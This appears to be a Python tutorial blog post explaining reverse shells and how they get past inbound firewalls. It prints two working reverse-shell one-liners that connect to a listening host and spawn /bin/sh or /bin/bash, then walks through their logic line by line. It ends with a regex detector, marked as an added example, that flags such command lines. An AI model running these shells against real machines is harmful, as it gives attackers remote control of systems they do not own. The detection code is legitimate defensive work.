This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:
What is a Reverse Shell?
Here’s the definition of a Reverse Shell:
A reverse shell is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.
The reason for a reverse shell is simple: it's often very hard for an attacker to gain access to a target machine because both the target's host firewall and the in-network firewall carefully protect the user from incoming connections. Arguably, this is necessary because hackers from all over the world constantly try to force their way into your machine (if it is reachable from the Internet).
However, it's almost impossible for the same firewalls to block all outgoing connections. You could only do so by restricting which connections the (potential) target is allowed to open in the first place. But system administrators and programmers must be able to open ports and communicate with other machines via TCP connections. That is what computers are here for, after all.
A reverse shell exploits this asymmetry and reverses the standard way of getting access to a target machine: now the target opens the connection to the attacker, and firewalls will often allow such outbound connections, assuming the owner of the target machine knows what they're doing.
The only thing the attacker must do is get the target to execute code on the target's machine that opens a reverse shell and connects back to the attacker's machine. The attacker opens a port on their own machine and waits for the target to connect to this port.
I found this code in a blog thread. You can run it from any computer that has Python installed and that can reach the listening machine from its current location:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
But you should never execute code that has been copy-and-pasted from an Internet source without reading it first. What if the code removes all files from your computer?
Let's have a look at what this code looks like as a Python multi-liner so that you can understand it better:
import socket, subprocess, os
# open a TCP socket and connect out to the listening (attacking) machine
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 1234))
# point stdin (0), stdout (1) and stderr (2) of this process at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# start an interactive shell; it inherits the redirected file descriptors
p = subprocess.call(["/bin/sh", "-i"])
As you can see, the code opens a socket (the endpoint of a network connection), duplicates the socket's file descriptor onto standard input, output and error, and then calls a Linux shell. Because it relies on /bin/sh and file descriptor duplication, it will only run on Linux-based systems.
In this GitHub thread, I found another one-liner that opens a reverse shell:
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
When written as the equivalent multi-liner, the code looks more understandable:
import pty
import socket, os
# open a TCP socket and connect out to the listening machine ("Kali-IP" is a placeholder)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("Kali-IP", 443))
# point stdin (0), stdout (1) and stderr (2) at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# spawn the shell inside a pseudo-terminal
pty.spawn("/bin/bash")
It's very similar to the code above, but it uses the pty library to create the shell. pty.spawn runs the shell inside a pseudo-terminal, so the shell behaves as if it were attached to a real terminal instead of a plain socket.
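Both one-liners share the same three traits: an outbound TCP connect, all three standard file descriptors dup2'ed onto that socket, and a shell spawned on top. The following detector, an added example that is not part of the original article, scores process command lines on exactly those traits and only flags a line when all three are present; the sample command lines and their addresses are constructed for the example.

```python
import re
from typing import Dict, List

# Three traits that, combined, fingerprint the one-liners shown above: an
# outbound TCP connect, fds 0, 1 and 2 all dup2'ed onto that socket, and a
# shell spawned on top of the redirected stdio.
_CONNECT = re.compile(r"socket\.socket\(.*?\.connect\(\(")
_DUP2_FD = re.compile(r"os\.dup2\([^)]*\.fileno\(\)\s*,\s*([012])\)")
_SHELL = re.compile(
    r'subprocess\.(?:call|Popen|run)\(\[\s*"/bin/(?:sh|bash)"'
    r'|pty\.spawn\("/bin/(?:sh|bash)"\)'
)

def score_cmdline(cmdline: str) -> Dict[str, bool]:
    """Return which reverse-shell traits a process command line exhibits."""
    fds = set(_DUP2_FD.findall(cmdline))
    return {
        "outbound_connect": _CONNECT.search(cmdline) is not None,
        "stdio_on_socket": fds == {"0", "1", "2"},
        "shell_spawn": _SHELL.search(cmdline) is not None,
    }

def is_reverse_shell(cmdline: str) -> bool:
    """Flag only when all three traits coincide; any one alone is common in benign code."""
    return all(score_cmdline(cmdline).values())

def find_reverse_shells(cmdlines: List[str]) -> List[int]:
    """Indexes of the command lines that match the full fingerprint."""
    return [i for i, c in enumerate(cmdlines) if is_reverse_shell(c)]

# Constructed sample process command lines (addresses are placeholders).
SAMPLE_CMDLINES = [
    # the first one-liner from the article
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
    'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'',
    # benign: redirects stdout to a log file only, no socket involved
    "python -c 'import os;f=open(\"out.log\",\"w\");os.dup2(f.fileno(),1);print(1)'",
    # benign: opens a socket and runs a shell command, but stdio stays on the terminal
    "python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.0.0.2\",8080));subprocess.call([\"/bin/sh\",\"-c\",\"uptime\"])'",
    # the second one-liner from the article (pty variant)
    "python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("10.0.0.3",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
    'os.dup2(s.fileno(),2);pty.spawn("/bin/bash")\'',
]

if __name__ == "__main__":
    print(find_reverse_shells(SAMPLE_CMDLINES))  # [0, 3]
```

Feeding it real process command lines (for example from an EDR or auditd execve records) would be the next step; the point here is that socket use or shell spawning alone is noisy, while the dup2 of all three standard descriptors onto a socket is the distinctive part.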
While working as a researcher in distributed systems, Dr. Christian Mayer found his love for teaching computer science students.
To help students reach higher levels of Python success, he founded the programming education website Finxter.com that has taught exponential skills to millions of coders worldwide. He’s the author of the best-selling programming books Python One-Liners (NoStarch 2020), The Art of Clean Code (NoStarch 2022), and The Book of Dash (NoStarch 2022). Chris also coauthored the Coffee Break Python series of self-published books. He’s a computer science enthusiast, freelancer, and owner of one of the top 10 largest Python blogs worldwide.
His passions are writing, reading, and coding. But his greatest passion is to serve aspiring coders through Finxter and help them to boost their skills. You can join his free email academy here.